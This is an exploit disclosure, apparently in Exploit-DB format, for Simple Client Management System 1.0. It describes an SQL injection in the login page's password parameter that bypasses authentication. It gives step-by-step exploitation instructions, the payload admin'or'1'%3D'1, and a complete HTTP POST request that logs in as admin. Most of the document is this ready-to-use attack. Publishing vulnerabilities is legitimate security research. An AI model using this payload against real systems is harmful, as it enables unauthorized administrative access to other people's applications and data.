# Exploit Title: Simple Client Management System 1.0 - SQLi (Authentication Bypass) # Exploit Author: Sentinal920 # Date: 5-11-2021 (5th Nov 2021) # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: Login # Vulnerable Parameter: "password" Technical description: An SQL Injection vulnerability exists in the Simple Client Management System. An attacker can leverage the vulnerable "password" parameter in the "Login.php" web page to authenticate as an admin user. Steps to exploit: 1) Navigate to http://localhost/cms/admin/login.php 2) Set username as admin and insert your payload in the password parameter Proof of concept (Poc): The following payload inside password will allow you to login into the web server as admin admin'or'1'%3D'1 --- POST /cms/classes/Login.php?f=login HTTP/1.1 Host: localhost Content-Length: 51 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/login.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close username=admin'or'1'%3D'1&password=admin'or'1'%3D'1 ---